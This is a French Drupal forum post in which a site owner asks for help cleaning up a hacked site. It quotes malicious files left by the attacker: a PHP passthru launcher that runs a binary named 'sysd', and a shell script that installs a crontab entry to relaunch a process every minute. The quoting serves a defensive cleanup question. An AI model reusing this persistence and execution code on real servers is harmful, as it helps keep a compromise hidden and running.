Message d'avertissement

The subscription service is currently unavailable. Please try again later.

Site vérolé à mettre à jour

Information importante

En raison d'un grand nombre d'inscriptions de spammers sur notre site, polluant sans relache notre forum, nous suspendons la création de compte via le formulaire de "sign up".

Il est néanmoins toujours possible de devenir adhérent•e en faisant la demande sur cette page, rubrique "Inscription" : https://www.drupal.fr/contact


De plus, le forum est désormais "interdit en écriture". Il n'est plus autorisé d'y écrire un sujet/billet/commentaire.

Pour contacter la communauté, merci de rejoindre le slack "drupalfrance".

Si vous voulez contacter le bureau de l'association, utilisez le formulaire disponible ici, ou envoyez-nous un DM sur twitter.

Bonjour, j'ai un site sous Drupal qui a été attaqué et les navigateurs le bloquent en disant qu'il est susceptible de pishing.
En regardant dans le ftp j'ai effectivement vu une quantité de fichers php aux noms bizarres, datant de peu (alors que le site date de 2014), je vais donc les supprimer avant de faire la maj.
Mais dans le dossier sites/default/files il y a une série de dossiers cachés (avec un point devant :
.argparse
.hyper_root
.lib
.public
.sts
.unix
Comme ce n'est pas moi qui l'ai installé et managé jusque là j'ignore si ils ont une utilité mais je suppose que des dossiers cachés ne doivent pas être très catholiques dans ce dossier. Me trompe-je ?
Il y a aussi un dossier Ameli_ (le site n'a rien à voir avec la Sécu) et des fichiers php numérotés (1.php ...) et dedans :

<?php
echo passthru('chmod 777 sysd && ./sysd -c 2.cf');
?>

Toujours dans ce dossier files, il y a aussi une tripotée de php mais les noms de certains me font douter.
par exemple Raid.php. dedans il y a d'abord du code en signes cabalistiques, mais ensuite il est indiqu" Leaf PHP Mailer by [leafmailer.pw]
et un mot de passe
Il y a aussi smtp.php, viex-admins-file.php, updates.php, wp-nav-menus.php (celui-là on se demande vraiment ce qu'il y fait !!), xmailer;php...
je suppose que même s'ils ont des noms qui semblent "légaux" des fichiers php n'ont rien à faire dans ce dossier ?

Il y a aussi des dossiers qui semblent correspondre à certains modules mais dedans des fichiers curieux. Par exemple un dossier crond dans lequel il y a des fichiers a, dir.dir, e, f, m, m1, upd, x (sans extension).
Si j'ouvre le a voici son contenu :

pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./r &>/dev/null" > upd
chmod u+x upd
./upd

Je peux supprimer ce genre de trucs ?

Merci d'avance

PS : le site en ligne est désactivé, je nettoie sur une copie en local

Version de Drupal :